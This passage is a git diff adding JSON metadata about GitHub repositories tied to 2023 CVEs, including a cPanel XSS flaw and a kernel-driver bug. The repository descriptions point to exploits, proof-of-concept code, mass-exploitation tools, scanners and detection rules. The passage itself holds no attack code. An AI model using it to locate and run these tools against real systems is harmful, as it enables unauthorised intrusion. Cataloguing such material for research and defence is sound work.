0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737886117, + "name": "CVE-2023-29357-Check", + "full_name": "Jev1337\/CVE-2023-29357-Check", + "owner": { + "login": "Jev1337", + "id": 19759761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19759761?v=4", + "html_url": "https:\/\/github.com\/Jev1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jev1337\/CVE-2023-29357-Check", + "description": "A Python script that verifies whether a target is vulnerable to CVE-2023-29357 or not", + "fork": false, + "created_at": "2024-01-01T21:08:22Z", + "updated_at": "2024-11-06T09:07:45Z", + "pushed_at": "2024-01-01T21:13:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 856513093, + "name": "Event-ID-189-Rule-Name-SOC227-CVE-2023-29357", + "full_name": "AhmedMansour93\/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357", + "description": "Event ID 189 Rule Name SOC227 Microsoft SharePoint Server Elevation of Privilege Possible CVE-2023-29357 .. Exploitation", + "fork": false, + "created_at": "2024-09-12T17:45:25Z", + "updated_at": "2024-09-12T17:45:57Z", + "pushed_at": "2024-09-12T17:45:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29360.json b/2023/CVE-2023-29360.json new file mode 100644 index 0000000000..3294f385dd --- /dev/null +++ b/2023/CVE-2023-29360.json @@ -0,0 +1,64 @@ +[ + { + "id": 696013086, + "name": "cve-2023-29360", + "full_name": "Nero22k\/cve-2023-29360", + "owner": { + "login": "Nero22k", + "id": 64486541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64486541?v=4", + "html_url": "https:\/\/github.com\/Nero22k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nero22k\/cve-2023-29360", + "description": "Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver", + "fork": false, + "created_at": "2023-09-24T21:59:23Z", + "updated_at": "2024-11-20T13:36:51Z", + "pushed_at": "2023-10-12T19:18:32Z", + "stargazers_count": 144, + "watchers_count": 144, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 144, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 850466517, + "name": "CVE-2023-29360", + "full_name": "0xDivyanshu-new\/CVE-2023-29360", + "owner": { + "login": "0xDivyanshu-new", + "id": 135882723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135882723?v=4", + "html_url": "https:\/\/github.com\/0xDivyanshu-new", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDivyanshu-new\/CVE-2023-29360", + "description": "POC for CVE-2023-29360", + "fork": false, + "created_at": "2024-08-31T21:08:39Z", + "updated_at": "2024-11-14T07:27:55Z", + "pushed_at": "2024-08-31T21:11:39Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29384.json b/2023/CVE-2023-29384.json new file mode 100644 index 0000000000..a47a64866b --- /dev/null +++ b/2023/CVE-2023-29384.json @@ -0,0 +1,33 @@ +[ + { + "id": 845081346, + "name": "CVE-2023-29384", + "full_name": "nastar-id\/CVE-2023-29384", + "owner": { + "login": "nastar-id", + "id": 57721604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4", + "html_url": "https:\/\/github.com\/nastar-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nastar-id\/CVE-2023-29384", + "description": "CVE-2023-29384 Auto Exploiter on WordPress Job Board and Recruitment Plugin", + "fork": false, + "created_at": "2024-08-20T14:43:33Z", + "updated_at": "2024-08-21T02:05:28Z", + "pushed_at": "2024-08-21T02:05:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29406.json b/2023/CVE-2023-29406.json new file mode 100644 index 0000000000..db6ddf456e --- /dev/null +++ b/2023/CVE-2023-29406.json @@ -0,0 +1,33 @@ +[ + { + "id": 717490918, + "name": "EP3_Redes", + "full_name": "LuizGustavoP\/EP3_Redes", + "owner": { + "login": "LuizGustavoP", + "id": 62386766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62386766?v=4", + "html_url": "https:\/\/github.com\/LuizGustavoP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LuizGustavoP\/EP3_Redes", + "description": "Implementações de servidores HTML em GO para análise da vulnerabilidade CVE-2023-29406.", + "fork": false, + "created_at": "2023-11-11T16:28:22Z", + "updated_at": "2023-11-11T16:28:22Z", + "pushed_at": "2023-11-11T16:28:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29409.json b/2023/CVE-2023-29409.json new file mode 100644 index 0000000000..19d0e1be94 --- /dev/null +++ b/2023/CVE-2023-29409.json @@ -0,0 +1,33 @@ +[ + { + "id": 681256401, + "name": "CVE-2023-29409", + "full_name": "mateusz834\/CVE-2023-29409", + "owner": { + "login": "mateusz834", + "id": 19653795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19653795?v=4", + "html_url": "https:\/\/github.com\/mateusz834", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mateusz834\/CVE-2023-29409", + "description": " CVE-2023-29409 reproducer", + "fork": false, + "created_at": "2023-08-21T15:59:26Z", + "updated_at": "2024-08-12T20:32:33Z", + "pushed_at": "2023-08-21T16:03:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29439.json b/2023/CVE-2023-29439.json new file mode 100644 index 0000000000..a89a0955fd --- /dev/null +++ b/2023/CVE-2023-29439.json @@ -0,0 +1,33 @@ +[ + { + "id": 662588518, + "name": "CVE-2023-29439", + "full_name": "LOURC0D3\/CVE-2023-29439", + "owner": { + "login": "LOURC0D3", + "id": 83567597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4", + "html_url": "https:\/\/github.com\/LOURC0D3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2023-29439", + "description": "PoC of CVE-2023-29439", + "fork": false, + "created_at": "2023-07-05T13:04:39Z", + "updated_at": "2023-08-06T14:54:28Z", + "pushed_at": "2023-07-05T13:06:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29478.json b/2023/CVE-2023-29478.json new file mode 100644 index 0000000000..232da569b2 --- /dev/null +++ b/2023/CVE-2023-29478.json @@ -0,0 +1,33 @@ +[ + { + "id": 558229768, + "name": "BiblioRCE", + "full_name": "Exopteron\/BiblioRCE", + "owner": { + "login": "Exopteron", + "id": 52125609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52125609?v=4", + "html_url": "https:\/\/github.com\/Exopteron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Exopteron\/BiblioRCE", + "description": "CVE-2023-29478 - BiblioCraft File Manipulation\/Remote Code Execution exploit affecting BiblioCraft versions prior to v2.4.6", + "fork": false, + "created_at": "2022-10-27T06:17:24Z", + "updated_at": "2024-08-04T01:00:19Z", + "pushed_at": "2024-03-13T01:56:41Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29489.json b/2023/CVE-2023-29489.json new file mode 100644 index 0000000000..0b96e8379c --- /dev/null +++ b/2023/CVE-2023-29489.json @@ -0,0 +1,612 @@ +[ + { + "id": 633223830, + "name": "CVE-2023-29489", + "full_name": "learnerboy88\/CVE-2023-29489", + "owner": { + "login": "learnerboy88", + "id": 99548826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99548826?v=4", + "html_url": "https:\/\/github.com\/learnerboy88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/learnerboy88\/CVE-2023-29489", + "description": "Nuclei template for CVE-2023-29489", + "fork": false, + "created_at": "2023-04-27T03:30:24Z", + "updated_at": "2023-04-27T03:30:24Z", + "pushed_at": "2023-04-27T03:32:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633587053, + "name": "cPanel-CVE-2023-29489", + "full_name": "xKore123\/cPanel-CVE-2023-29489", + "owner": { + "login": "xKore123", + "id": 63617858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63617858?v=4", + "html_url": "https:\/\/github.com\/xKore123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xKore123\/cPanel-CVE-2023-29489", + "description": null, + "fork": false, + "created_at": "2023-04-27T20:51:47Z", + "updated_at": "2024-04-12T17:47:40Z", + "pushed_at": "2023-04-27T21:17:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633952269, + "name": "CVE-2023-29489.py", + "full_name": "ipk1\/CVE-2023-29489.py", + "owner": { + "login": "ipk1", + "id": 32953048, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32953048?v=4", + "html_url": "https:\/\/github.com\/ipk1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipk1\/CVE-2023-29489.py", + "description": "a pyhton script to test all results from shodan for cPanel CVE-2023-29489, credits to @assetnote, I just automate", + "fork": false, + "created_at": "2023-04-28T16:56:36Z", + "updated_at": "2023-07-12T02:27:49Z", + "pushed_at": "2023-04-28T17:02:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 634124004, + "name": "CVE-2023-29489.yaml", + "full_name": "Mostafa-Elguerdawi\/CVE-2023-29489.yaml", + "owner": { + "login": "Mostafa-Elguerdawi", + "id": 61470364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61470364?v=4", + "html_url": "https:\/\/github.com\/Mostafa-Elguerdawi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mostafa-Elguerdawi\/CVE-2023-29489.yaml", + "description": null, + "fork": false, + "created_at": "2023-04-29T05:52:53Z", + "updated_at": "2023-04-29T05:52:54Z", + "pushed_at": "2023-04-29T05:52:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634124302, + "name": "CVE-2023-29489", + "full_name": "Mostafa-Elguerdawi\/CVE-2023-29489", + "owner": { + "login": "Mostafa-Elguerdawi", + "id": 61470364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61470364?v=4", + "html_url": "https:\/\/github.com\/Mostafa-Elguerdawi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mostafa-Elguerdawi\/CVE-2023-29489", + "description": null, + "fork": false, + "created_at": "2023-04-29T05:54:19Z", + "updated_at": "2023-04-29T05:54:20Z", + "pushed_at": "2023-04-29T05:55:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634734009, + "name": "EagleEye", + "full_name": "whalebone7\/EagleEye", + "owner": { + "login": "whalebone7", + "id": 125891350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125891350?v=4", + "html_url": "https:\/\/github.com\/whalebone7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whalebone7\/EagleEye", + "description": "To filter the actual vulnerable URLs from the screenshots, you can use the ee.sh script. Simply run .\/ee.sh -f \"path\/to\/index_screenshot.txt\" -k \"hacked\" and the script will filter the URLs that contain the reflective XSS payload (For Example: cPanel CVE-2023-29489 ) in their screenshots.", + "fork": false, + "created_at": "2023-05-01T03:29:11Z", + "updated_at": "2023-06-26T15:36:40Z", + "pushed_at": "2023-05-01T03:44:47Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 642105586, + "name": "CVE-2023-29489", + "full_name": "0-d3y\/CVE-2023-29489", + "owner": { + "login": "0-d3y", + "id": 103077384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103077384?v=4", + "html_url": "https:\/\/github.com\/0-d3y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0-d3y\/CVE-2023-29489", + "description": "Mass Scaning vulnerability in Cpanel [XSS] ", + "fork": false, + "created_at": "2023-05-17T20:46:59Z", + "updated_at": "2024-11-19T12:09:30Z", + "pushed_at": "2024-08-25T00:34:47Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 648330999, + "name": "CVE-2023-29489", + "full_name": "Abdullah7-ma\/CVE-2023-29489", + "owner": { + "login": "Abdullah7-ma", + "id": 71210670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71210670?v=4", + "html_url": "https:\/\/github.com\/Abdullah7-ma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdullah7-ma\/CVE-2023-29489", + "description": "CVE-2023-29489-XSS", + "fork": false, + "created_at": "2023-06-01T18:13:17Z", + "updated_at": "2024-07-10T13:47:36Z", + "pushed_at": "2024-07-10T13:47:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652041402, + "name": "CVE-2023-29489", + "full_name": "tucommenceapousser\/CVE-2023-29489", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-29489", + "description": null, + "fork": false, + "created_at": "2023-06-10T22:34:59Z", + "updated_at": "2023-06-10T22:35:14Z", + "pushed_at": "2023-06-10T22:35:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652043509, + "name": "CVE-2023-29489.py", + "full_name": "tucommenceapousser\/CVE-2023-29489.py", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-29489.py", + "description": null, + "fork": false, + "created_at": "2023-06-10T22:48:54Z", + "updated_at": "2023-06-10T22:49:09Z", + "pushed_at": "2023-06-10T22:49:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 674826920, + "name": "cpanel-xss-177", + "full_name": "ViperM4sk\/cpanel-xss-177", + "owner": { + "login": "ViperM4sk", + "id": 141459387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141459387?v=4", + "html_url": "https:\/\/github.com\/ViperM4sk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ViperM4sk\/cpanel-xss-177", + "description": "Mass Exploitation For (CVE-2023-29489)", + "fork": false, + "created_at": "2023-08-04T22:21:57Z", + "updated_at": "2023-08-04T23:05:52Z", + "pushed_at": "2023-08-05T01:31:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706134149, + "name": "CVE-2023-29489", + "full_name": "S4muraiMelayu1337\/CVE-2023-29489", + "owner": { + "login": "S4muraiMelayu1337", + "id": 130330296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130330296?v=4", + "html_url": "https:\/\/github.com\/S4muraiMelayu1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S4muraiMelayu1337\/CVE-2023-29489", + "description": null, + "fork": false, + "created_at": "2023-10-17T11:18:53Z", + "updated_at": "2023-10-17T11:21:12Z", + "pushed_at": "2023-10-17T11:23:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719748102, + "name": "CVE-2023-29489", + "full_name": "SynixCyberCrimeMy\/CVE-2023-29489", + "owner": { + "login": "SynixCyberCrimeMy", + "id": 151055664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151055664?v=4", + "html_url": "https:\/\/github.com\/SynixCyberCrimeMy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SynixCyberCrimeMy\/CVE-2023-29489", + "description": "SynixCyberCrimeMY CVE-2023-29489 Scanner By SamuraiMelayu1337 & h4zzzzzz@scc", + "fork": false, + "created_at": "2023-11-16T20:24:11Z", + "updated_at": "2023-11-16T20:25:12Z", + "pushed_at": "2023-11-16T20:30:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734955941, + "name": "Validate-CVE-2023-29489-scanner-", + "full_name": "Makurorororororororo\/Validate-CVE-2023-29489-scanner-", + "owner": { + "login": "Makurorororororororo", + "id": 110962804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110962804?v=4", + "html_url": "https:\/\/github.com\/Makurorororororororo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Makurorororororororo\/Validate-CVE-2023-29489-scanner-", + "description": null, + "fork": false, + "created_at": "2023-12-23T06:28:32Z", + "updated_at": "2024-06-07T07:44:55Z", + "pushed_at": "2023-12-23T06:35:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746343792, + "name": "tool-29489", + "full_name": "prasad-1808\/tool-29489", + "owner": { + "login": "prasad-1808", + "id": 86564180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86564180?v=4", + "html_url": "https:\/\/github.com\/prasad-1808", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prasad-1808\/tool-29489", + "description": "This Tool is used to check for CVE-2023-29489 Vulnerability in the provided URL with the set of payloads available", + "fork": false, + "created_at": "2024-01-21T19:23:47Z", + "updated_at": "2024-01-21T19:38:23Z", + "pushed_at": "2024-01-21T20:10:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747385819, + "name": "cpanel_xss_2023", + "full_name": "mdaseem03\/cpanel_xss_2023", + "owner": { + "login": "mdaseem03", + "id": 98540960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98540960?v=4", + "html_url": "https:\/\/github.com\/mdaseem03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mdaseem03\/cpanel_xss_2023", + "description": "cpanel_xss_2023 is a simple Python script designed for finding CVE-2023-29489 vulnerability in cpanel.", + "fork": false, + "created_at": "2024-01-23T20:29:57Z", + "updated_at": "2024-12-02T05:38:14Z", + "pushed_at": "2024-01-31T16:23:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786366131, + "name": "CVE-2023-29489", + "full_name": "some-man1\/CVE-2023-29489", + "owner": { + "login": "some-man1", + "id": 142589483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142589483?v=4", + "html_url": "https:\/\/github.com\/some-man1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/some-man1\/CVE-2023-29489", + "description": "# CVE-2023-29489 exploit", + "fork": false, + "created_at": "2024-04-14T08:29:22Z", + "updated_at": "2024-04-14T08:32:44Z", + "pushed_at": "2024-04-14T08:45:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpanel", + "cve", + "cve-2023-29489", + "exploit", + "priv8", + "python", + "python3", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789738179, + "name": "CVE-2023-29489", + "full_name": "Cappricio-Securities\/CVE-2023-29489", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-29489", + "description": "An issue was discovered in cPanel before 11.109.9999.116. Cross-Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.", + "fork": false, + "created_at": "2024-04-21T12:26:22Z", + "updated_at": "2024-06-21T07:23:23Z", + "pushed_at": "2024-06-21T07:23:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpanel", + "cve", + "cve-2023-29489", + "reflected-xss", + "xss", + "xss-vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 807997088, + "name": "CVE-2023-29489", + "full_name": "md-thalal\/CVE-2023-29489", + "owner": { + "login": "md-thalal", + "id": 171010055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171010055?v=4", + "html_url": "https:\/\/github.com\/md-thalal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/md-thalal\/CVE-2023-29489", + "description": "CVE-2023-29489 is a vulnerability to exploitable in cross-site scripting ( xss ) reflect the cpanel ", + "fork": false, + "created_at": "2024-05-30T07:20:09Z", + "updated_at": "2024-06-12T05:58:43Z", + "pushed_at": "2024-06-12T05:58:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpanel", + "cross-site-scripting", + "xss-vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2951.json b/2023/CVE-2023-2951.json new file mode 100644 index 0000000000..da1f874059 --- /dev/null +++ b/2023/CVE-2023-2951.json @@ -0,0 +1,33 @@ +[ + { + "id": 646213230, + "name": "CVE-2023-2951", + "full_name": "Spr1te76\/CVE-2023-2951", + "owner": { + "login": "Spr1te76", + "id": 106242212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106242212?v=4", + "html_url": "https:\/\/github.com\/Spr1te76", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Spr1te76\/CVE-2023-2951", + "description": null, + "fork": false, + "created_at": "2023-05-27T16:45:03Z", + "updated_at": "2024-03-09T10:38:51Z", + "pushed_at": "2023-05-28T12:12:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29808.json b/2023/CVE-2023-29808.json new file mode 100644 index 0000000000..596cbbbe69 --- /dev/null +++ b/2023/CVE-2023-29808.json @@ -0,0 +1,33 @@ +[ + { + "id": 635861076, + "name": "CVE-2023-29808", + "full_name": "zPrototype\/CVE-2023-29808", + "owner": { + "login": "zPrototype", + "id": 43825360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43825360?v=4", + "html_url": "https:\/\/github.com\/zPrototype", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zPrototype\/CVE-2023-29808", + "description": null, + "fork": false, + "created_at": "2023-05-03T15:56:04Z", + "updated_at": "2024-08-10T17:51:19Z", + "pushed_at": "2023-05-03T15:58:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29809.json b/2023/CVE-2023-29809.json new file mode 100644 index 0000000000..d23a0ba584 --- /dev/null +++ b/2023/CVE-2023-29809.json @@ -0,0 +1,33 @@ +[ + { + "id": 634655162, + "name": "CVE-2023-29809", + "full_name": "zPrototype\/CVE-2023-29809", + "owner": { + "login": "zPrototype", + "id": 43825360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43825360?v=4", + "html_url": "https:\/\/github.com\/zPrototype", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zPrototype\/CVE-2023-29809", + "description": null, + "fork": false, + "created_at": "2023-04-30T20:26:04Z", + "updated_at": "2023-05-24T20:21:46Z", + "pushed_at": "2023-04-30T20:28:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2982.json b/2023/CVE-2023-2982.json new file mode 100644 index 0000000000..eb518710bd --- /dev/null +++ b/2023/CVE-2023-2982.json @@ -0,0 